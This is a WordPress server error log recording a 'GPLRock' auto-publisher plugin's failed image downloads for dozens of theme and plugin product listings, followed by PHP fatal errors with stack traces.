https://meldwp.com/wp-content/uploads/investex---corporate--accounting-theme-20747.webp [12-Apr-2026 00:48:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: investex-corporate-accounting-theme [12-Apr-2026 00:48:32 UTC] GPLRock: Image download failed for product concept-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:34 UTC] GPLRock: Image download failed for product concept-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/concept---multi-purpose-wordpress-theme-13385.webp for product concept-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:36 UTC] GPLRock: Image download failed for product concept-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:39 UTC] GPLRock: Image download failed for product concept-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/concept---multi-purpose-wordpress-theme-13385.webp for product concept-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:41 UTC] GPLRock WARNING: Image download failed for product concept-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/concept---multi-purpose-wordpress-theme-13385.webp [12-Apr-2026 00:48:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: concept-multi-purpose-wordpress-theme [12-Apr-2026 00:48:41 UTC] GPLRock: Image download failed for product planteo-gardening-and-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:43 UTC] GPLRock: Image download failed for product planteo-gardening-and-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/planteo---gardening-and-landscaping-wordpress-theme-7404.webp for product planteo-gardening-and-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:45 UTC] GPLRock: Image download failed for product planteo-gardening-and-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:47 UTC] GPLRock: Image download failed for product planteo-gardening-and-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/planteo---gardening-and-landscaping-wordpress-theme-7404.webp for product planteo-gardening-and-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:49 UTC] GPLRock WARNING: Image download failed for product planteo-gardening-and-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/planteo---gardening-and-landscaping-wordpress-theme-7404.webp [12-Apr-2026 00:48:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: planteo-gardening-and-landscaping-wordpress-theme [12-Apr-2026 00:48:50 UTC] GPLRock: Image download failed for product bridely-wedding-event-management-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:52 UTC] GPLRock: Image download failed for product bridely-wedding-event-management-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bridely--wedding--event-management-wordpress-theme-27770.webp for product bridely-wedding-event-management-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:54 UTC] GPLRock: Image download failed for product bridely-wedding-event-management-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:56 UTC] GPLRock: Image download failed for product bridely-wedding-event-management-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bridely--wedding--event-management-wordpress-theme-27770.webp for product bridely-wedding-event-management-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:58 UTC] GPLRock WARNING: Image download failed for product bridely-wedding-event-management-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bridely--wedding--event-management-wordpress-theme-27770.webp [12-Apr-2026 00:48:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bridely-wedding-event-management-wordpress-theme [12-Apr-2026 00:48:58 UTC] GPLRock: Image download failed for product kaleido-photography-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:49:00 UTC] GPLRock: Image download failed for product kaleido-photography-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:49:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kaleido--photography-theme-for-wordpress-8742.webp for product kaleido-photography-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:49:03 UTC] GPLRock: Image download failed for product kaleido-photography-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:49:05 UTC] GPLRock: Image download failed for product kaleido-photography-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:49:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kaleido--photography-theme-for-wordpress-8742.webp for product kaleido-photography-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:49:07 UTC] GPLRock WARNING: Image download failed for product kaleido-photography-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/kaleido--photography-theme-for-wordpress-8742.webp [12-Apr-2026 00:49:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kaleido-photography-theme-for-wordpress [13-Apr-2026 00:45:23 UTC] GPLRock: Image download failed for product filebob-file-sharing-and-storage-platform-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:25 UTC] GPLRock: Image download failed for product filebob-file-sharing-and-storage-platform-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:26 UTC] GPLRock: Image download failed for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/filebob---file-sharing-and-storage-platform-saas-8908.webp for product filebob-file-sharing-and-storage-platform-saas after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:28 UTC] GPLRock: Image download failed for product filebob-file-sharing-and-storage-platform-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:28 UTC] GPLRock: Image download failed for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:30 UTC] GPLRock: Image download failed for product filebob-file-sharing-and-storage-platform-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7---infusionsoft-integration--contact-form-7---keap-crm-integration-12563.webp for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:30 UTC] GPLRock: Image download failed for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/filebob---file-sharing-and-storage-platform-saas-8908.webp for product filebob-file-sharing-and-storage-platform-saas after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:32 UTC] GPLRock WARNING: Image download failed for product filebob-file-sharing-and-storage-platform-saas. URL: https://meldwp.com/wp-content/uploads/filebob---file-sharing-and-storage-platform-saas-8908.webp [13-Apr-2026 00:45:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: filebob-file-sharing-and-storage-platform-saas [13-Apr-2026 00:45:32 UTC] GPLRock: Image download failed for product pricing-tables-vc-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:32 UTC] GPLRock: Image download failed for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:34 UTC] GPLRock: Image download failed for product pricing-tables-vc-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7---infusionsoft-integration--contact-form-7---keap-crm-integration-12563.webp for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:34 UTC] GPLRock WARNING: Image download failed for product contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration. URL: https://meldwp.com/wp-content/uploads/contact-form-7---infusionsoft-integration--contact-form-7---keap-crm-integration-12563.webp [13-Apr-2026 00:45:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-form-7-infusionsoft-integration-contact-form-7-keap-crm-integration [13-Apr-2026 00:45:35 UTC] GPLRock: Image download failed for product woocommerce-pre-order-pre-booking-pre-release-purchase (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pricing-tables---vc-addon-12029.webp for product pricing-tables-vc-addon after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:36 UTC] GPLRock: Image download failed for product pricing-tables-vc-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:37 UTC] GPLRock: Image download failed for product woocommerce-pre-order-pre-booking-pre-release-purchase (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:39 UTC] GPLRock: Image download failed for product pricing-tables-vc-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pre-order--pre-booking--pre-release-purchase-10301.webp for product woocommerce-pre-order-pre-booking-pre-release-purchase after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:39 UTC] GPLRock: Image download failed for product woocommerce-pre-order-pre-booking-pre-release-purchase (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pricing-tables---vc-addon-12029.webp for product pricing-tables-vc-addon after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:41 UTC] GPLRock WARNING: Image download failed for product pricing-tables-vc-addon. URL: https://meldwp.com/wp-content/uploads/pricing-tables---vc-addon-12029.webp [13-Apr-2026 00:45:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pricing-tables-vc-addon [13-Apr-2026 00:45:41 UTC] GPLRock: Image download failed for product wordpress-mobile-menu-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:41 UTC] GPLRock: Image download failed for product woocommerce-pre-order-pre-booking-pre-release-purchase (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:43 UTC] GPLRock: Image download failed for product wordpress-mobile-menu-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pre-order--pre-booking--pre-release-purchase-10301.webp for product woocommerce-pre-order-pre-booking-pre-release-purchase after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:43 UTC] GPLRock WARNING: Image download failed for product woocommerce-pre-order-pre-booking-pre-release-purchase. URL: https://meldwp.com/wp-content/uploads/woocommerce-pre-order--pre-booking--pre-release-purchase-10301.webp [13-Apr-2026 00:45:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-pre-order-pre-booking-pre-release-purchase [13-Apr-2026 00:45:43 UTC] GPLRock: Image download failed for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-mobile-menu-bundle-10287.webp for product wordpress-mobile-menu-bundle after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:45 UTC] GPLRock: Image download failed for product wordpress-mobile-menu-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:45 UTC] GPLRock: Image download failed for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:47 UTC] GPLRock: Image download failed for product wordpress-mobile-menu-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/egrocer---online-multi-vendor-grocery-store-ecommerce-flutter-full-app--admin-pa-4556.webp for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:47 UTC] GPLRock: Image download failed for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-mobile-menu-bundle-10287.webp for product wordpress-mobile-menu-bundle after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:49 UTC] GPLRock WARNING: Image download failed for product wordpress-mobile-menu-bundle. URL: https://meldwp.com/wp-content/uploads/wordpress-mobile-menu-bundle-10287.webp [13-Apr-2026 00:45:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-mobile-menu-bundle [13-Apr-2026 00:45:49 UTC] GPLRock: Image download failed for product wc-marketplace-vendor-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:50 UTC] GPLRock: Image download failed for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:52 UTC] GPLRock: Image download failed for product wc-marketplace-vendor-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/egrocer---online-multi-vendor-grocery-store-ecommerce-flutter-full-app--admin-pa-4556.webp for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:52 UTC] GPLRock WARNING: Image download failed for product egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version. URL: https://meldwp.com/wp-content/uploads/egrocer---online-multi-vendor-grocery-store-ecommerce-flutter-full-app--admin-pa-4556.webp [13-Apr-2026 00:45:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: egrocer-online-multi-vendor-grocery-store-ecommerce-flutter-full-app-admin-panel-web-version [13-Apr-2026 00:45:52 UTC] GPLRock: Image download failed for product premium-multi-scroll-vertical-scroll-widgets-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wc-marketplace-vendor-filter-2310.webp for product wc-marketplace-vendor-filter after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:54 UTC] GPLRock: Image download failed for product wc-marketplace-vendor-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:54 UTC] GPLRock: Image download failed for product premium-multi-scroll-vertical-scroll-widgets-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:56 UTC] GPLRock: Image download failed for product wc-marketplace-vendor-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-multi-scroll--vertical-scroll-widgets-for-elementor-21555.webp for product premium-multi-scroll-vertical-scroll-widgets-for-elementor after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:56 UTC] GPLRock: Image download failed for product premium-multi-scroll-vertical-scroll-widgets-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wc-marketplace-vendor-filter-2310.webp for product wc-marketplace-vendor-filter after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:45:58 UTC] GPLRock WARNING: Image download failed for product wc-marketplace-vendor-filter. URL: https://meldwp.com/wp-content/uploads/wc-marketplace-vendor-filter-2310.webp [13-Apr-2026 00:45:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wc-marketplace-vendor-filter [13-Apr-2026 00:45:58 UTC] GPLRock: Image download failed for product woocommerce-restrict-checkout-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:45:58 UTC] GPLRock: Image download failed for product premium-multi-scroll-vertical-scroll-widgets-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:00 UTC] GPLRock: Image download failed for product woocommerce-restrict-checkout-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-multi-scroll--vertical-scroll-widgets-for-elementor-21555.webp for product premium-multi-scroll-vertical-scroll-widgets-for-elementor after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:00 UTC] GPLRock WARNING: Image download failed for product premium-multi-scroll-vertical-scroll-widgets-for-elementor. URL: https://meldwp.com/wp-content/uploads/premium-multi-scroll--vertical-scroll-widgets-for-elementor-21555.webp [13-Apr-2026 00:46:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: premium-multi-scroll-vertical-scroll-widgets-for-elementor [13-Apr-2026 00:46:00 UTC] GPLRock: Image download failed for product securepay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:02 UTC] GPLRock: Image download failed for product securepay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/securepay-payment-gateway-for-woocommerce-3560.webp for product securepay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:05 UTC] GPLRock: Image download failed for product securepay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:07 UTC] GPLRock: Image download failed for product securepay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/securepay-payment-gateway-for-woocommerce-3560.webp for product securepay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:09 UTC] GPLRock WARNING: Image download failed for product securepay-payment-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/securepay-payment-gateway-for-woocommerce-3560.webp [13-Apr-2026 00:46:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: securepay-payment-gateway-for-woocommerce [13-Apr-2026 00:46:09 UTC] GPLRock: Image download failed for product parallax-one-page-builder-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:11 UTC] GPLRock: Image download failed for product parallax-one-page-builder-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/parallax-one-page-builder-wordpress-plugin-24293.webp for product parallax-one-page-builder-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:13 UTC] GPLRock: Image download failed for product parallax-one-page-builder-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:15 UTC] GPLRock: Image download failed for product parallax-one-page-builder-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/parallax-one-page-builder-wordpress-plugin-24293.webp for product parallax-one-page-builder-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:17 UTC] GPLRock WARNING: Image download failed for product parallax-one-page-builder-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/parallax-one-page-builder-wordpress-plugin-24293.webp [13-Apr-2026 00:46:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: parallax-one-page-builder-wordpress-plugin [13-Apr-2026 00:46:18 UTC] GPLRock: Image download failed for product woocommerce-advanced-cart-to-quote (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:20 UTC] GPLRock: Image download failed for product woocommerce-advanced-cart-to-quote (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advanced-cart-to-quote-15744.webp for product woocommerce-advanced-cart-to-quote after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:22 UTC] GPLRock: Image download failed for product woocommerce-advanced-cart-to-quote (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:24 UTC] GPLRock: Image download failed for product woocommerce-advanced-cart-to-quote (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advanced-cart-to-quote-15744.webp for product woocommerce-advanced-cart-to-quote after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:26 UTC] GPLRock WARNING: Image download failed for product woocommerce-advanced-cart-to-quote. URL: https://meldwp.com/wp-content/uploads/woocommerce-advanced-cart-to-quote-15744.webp [13-Apr-2026 00:46:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-advanced-cart-to-quote [13-Apr-2026 00:46:26 UTC] GPLRock: Image download failed for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:28 UTC] GPLRock: Image download failed for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpres-14956.webp for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:31 UTC] GPLRock: Image download failed for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:33 UTC] GPLRock: Image download failed for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpres-14956.webp for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:35 UTC] GPLRock WARNING: Image download failed for product wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpres-14956.webp [13-Apr-2026 00:46:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpressomatic-wordpress-to-wordpress-automatic-crossposter-plugin-for-wordpress [13-Apr-2026 00:46:35 UTC] GPLRock: Image download failed for product time-based-content-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:37 UTC] GPLRock: Image download failed for product time-based-content-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-based-content-for-wpbakery-page-builder-33233.webp for product time-based-content-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:39 UTC] GPLRock: Image download failed for product time-based-content-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:41 UTC] GPLRock: Image download failed for product time-based-content-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-based-content-for-wpbakery-page-builder-33233.webp for product time-based-content-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:43 UTC] GPLRock WARNING: Image download failed for product time-based-content-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/time-based-content-for-wpbakery-page-builder-33233.webp [13-Apr-2026 00:46:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: time-based-content-for-wpbakery-page-builder [13-Apr-2026 00:46:44 UTC] GPLRock: Image download failed for product pricetunex-woocommerce-smart-price-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:46 UTC] GPLRock: Image download failed for product pricetunex-woocommerce-smart-price-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pricetunex--woocommerce-smart-price-manager-30777.webp for product pricetunex-woocommerce-smart-price-manager after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:48 UTC] GPLRock: Image download failed for product pricetunex-woocommerce-smart-price-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:50 UTC] GPLRock: Image download failed for product pricetunex-woocommerce-smart-price-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [13-Apr-2026 00:46:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pricetunex--woocommerce-smart-price-manager-30777.webp for product pricetunex-woocommerce-smart-price-manager after 3 attempts. HTTP Code: 526, Error: [13-Apr-2026 00:46:52 UTC] GPLRock WARNING: Image download failed for product pricetunex-woocommerce-smart-price-manager. URL: https://meldwp.com/wp-content/uploads/pricetunex--woocommerce-smart-price-manager-30777.webp [13-Apr-2026 00:46:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pricetunex-woocommerce-smart-price-manager [13-Apr-2026 12:05:20 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-blog-header.php(13): require_once('/home/masterro/...') #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/index.php(17): require('/home/masterro/...') #8 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [13-Apr-2026 12:13:18 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 